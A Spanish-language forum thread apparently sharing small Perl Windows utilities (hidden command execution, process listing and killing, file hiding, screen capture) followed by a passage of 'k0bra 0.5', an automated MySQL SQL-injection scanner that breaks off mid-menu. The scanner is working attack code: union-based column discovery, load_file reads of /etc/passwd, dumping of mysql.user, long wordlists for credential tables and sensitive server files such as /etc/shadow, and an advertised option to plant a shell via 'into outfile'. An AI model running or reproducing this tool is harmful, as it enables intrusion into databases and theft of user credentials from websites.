Temas

Hola a todos

Acabo de hacer esta funcion cmd() para poder ejecutar comandos
de forma comoda

Código (perl) [Seleccionar] Expandir



#By Doddy H

use Win32::Job;

sub cmd {

my $job = Win32::Job->new;
$job->spawn("cmd",qq{cmd /C $_[0]},{
no_window => "true",
stdout => "logx.txt",
stderr => "logx.txt"
}
);
$ok = $job->run("30");

open (F,"logx.txt");
@words = <F>;
close F;

unlink("logx.txt");

return @words;

}



Ejemplo de uso

Código (perl) [Seleccionar] Expandir

@re = cmd("ver");
print @re;


Hola a les traigo un funcion para buscar links en una web

Código (perl) [Seleccionar] Expandir

use HTML::LinkExtor;

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($code);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}

Ejemplo de uso

Código (perl) [Seleccionar] Expandir

use LWP::Simple;

$code = get("http://127.0.0.1/doddy/index.php");

my @ver = get_links();

for my $url(@ver) {
print $url."\n";
}


Hola aca les traigo una funcion que les mostrara los procesos en su computadora

Código (perl) [Seleccionar] Expandir


use Win32::OLE qw(in);

sub getprocess {

my %procesos;

my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");

foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}


Ejemplo de uso

Código (perl) [Seleccionar] Expandir


my %vida = getprocess();

for my $data(keys %vida) {
print "[Proceso] : ".$data."\n";
print "[PID] : ".$vida{$data}."\n\n";
}


Hola a todos.

Aca les dejo una funcion que hice para reconocer nuestra IP sin necesidad de usar paginas webs con ese molesto servicio online

Código (perl) [Seleccionar] Expandir

#By Doddy H
use IO::Socket;

sub get_ip {
my $get = gethostbyname("");
return inet_ntoa($get);
}


Ejemplo de uso

Código (perl) [Seleccionar] Expandir


print get_ip();


Con esta funcion podran tener el tipo de disco que se e esta ejecutando actualmente (c:/ o el que sea)

Código (perl) [Seleccionar] Expandir

#By Doddy H
use Cwd;


sub getdrive {

$path = getcwd();

if ($path=~/(.*):\/\//ig or $path=~/(.*):\//) {
return $1.":/";
}

}


Ejemplo de uso

Código (perl) [Seleccionar] Expandir


print getdrive();


Con esta funcion podran esconder o mostraR archivos/directorios ocultos en windows

Código (perl) [Seleccionar] Expandir

#By Doddy H
use Win32::File;

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "error\n";
}
}


Ejemplo de uso show/hide

Código (perl) [Seleccionar] Expandir


hideit("test.pl","show");



Hola a todos.

Con este funcion podran sacar una foto del sistema

Código (perl) [Seleccionar] Expandir

#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

capture_window();

sub capture_window {

SendKeys("%{PRTSCR}");

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">foto.bmp");
binmode(FOTO);
print FOTO $a;
close FOTO;

}

Ejemplo de uso

Código [Seleccionar] Expandir


capture_window()


Y tendran la foto con el nombre de foto.bmp

Hola , con esta funcion podran crear un archivo y escribir en el , Si el archivo ya existe solo escribe y no lo borra

Código (perl) [Seleccionar] Expandir

#By Doddy H
sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE;
}


Ejemplo de uso

Código (perl) [Seleccionar] Expandir

savefile("C:\\Windows\\Logs\\file.txt","hola")


Hola a todos , hoy les traigo una funcion para poder
usar colores en perl para mostrar en el texto que queremos

Código (perl) [Seleccionar] Expandir

#By Doddy H

use Color::Output;
Color::Output::Init;

sub printear {
if ($_[1] eq "text") {
cprint("\x03".$_[2].$_[0]."\x030\n");
}
elsif ($_[1] eq "stdin") {
if ($_[3] ne "") {
cprint("\x03".$_[2].$_[0]."\x030"."\x03".$_[3]);
my $op = <stdin>;
chomp $op;
cprint ("\x030");
return $op;
}
}
else {
print "error\n";
}
}

Sintasis

Código [Seleccionar] Expandir


printear("text","text/stdin","color text","color output")


Ejemplos de uso

Con texto normal

Código (perl) [Seleccionar] Expandir

printear("hola","text","10","5");


Texto con entrada de teclado

Código (perl) [Seleccionar] Expandir


my $d  = printear("nombre : ","stdin","6","2");
print "pusiste $d\n";


Hola a todos , aca les traigo un funcion para cerrar el proceso que odien marcando el nombre y el pid

Código (perl) [Seleccionar] Expandir

use Win32::Process;

sub killprocess {

my ($numb,$pid) = @_;

if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}

Ejemplo de uso

Código (perl) [Seleccionar] Expandir

if (killprocess("deamon.exe","4052")) {
print "chau\n\a";
}


Bueno , con esta funcion podran volver loca a una ventana para que se mueva de formas maleficas

Código (perl) [Seleccionar] Expandir

#By Doddy H
use Win32::API;

sub movewin {
for my $n(1..20) {
Win32::API->new("user32","SetWindowPos",[qw(N N N N N NN)],'N')->Call($_[0],$n,$n,$n,$n,$n,$n);
}
}


Ejemplo de uso

Código [Seleccionar] Expandir


movewin(id ventana);


Bueno esta es la nueva version de un scanner sqli que habia hecho ,
le arregle varios errores y agregue algunas cosas

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#k0bra 0.5
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H
#
#
#C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
#
#
#
#
# @      @@   @
#@@     @  @ @@
# @ @@  @  @  @ @   @ @ @@@
# @ @   @  @  @@ @ @@@ @  @
# @@    @  @  @  @  @   @@@
# @ @   @  @  @  @  @  @  @
#@@@ @   @@   @@@  @@@ @@@@@
#
#
#
#
#[Status] : Scanning.....
#[Status] : Enjoy the menu
#
#[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
#[Bypass] : --
#
#
#
#--== information_schema.tables ==--
#
#[1] : Show tables
#[2] : Show columns
#[3] : Show DBS
#[4] : Show tables witg other DB
#[5] : Show columns with other DB
#
#
#--== mysql.user ==--
#
#[6] : Show users
#
#
#--== Others ==--
#
#[7] : Fuzzing tables
#[8] : Fuzzing columns
#[9] : Fuzzing files with load_file
#[10] : Dump
#[11] : Informacion of the server
#[12] : Create a shell with into outfile
#[13] : Show Log
#[14] : Exit
#
#
#[Option] : Enjoy this program xDDDDD
#

system('cls');
system ("title k0bra");



@buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','admin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','user_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');

@buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');


@buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;
unless(@ARGV == 2) {
&menu;
} else {
&scan($ARGV[0],$ARVG[1]);
}
&finish;

sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %00] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}

sub scan {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
<STDIN>;
&head;
&menu;
}
}

sub head {
system 'cls';
print qq(


@      @@   @             
@@     @  @ @@             
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@




);
}




sub copyright {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
}


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}

sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n";
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}
}

sub menu_options {
print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n\n--== Others ==--\n\n";
print "[7] : Fuzzing tables\n";
print "[8] : Fuzzing columns\n";
print "[9] : Fuzzing files with load_file\n";
print "[10] : Dump\n";
print "[11] : Informacion of the server\n";
print "[12] : Create a shell with into outfile\n";
print "[13] : Show Log\n";
print "[14] : Change Target\n";
print "[15] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;
}
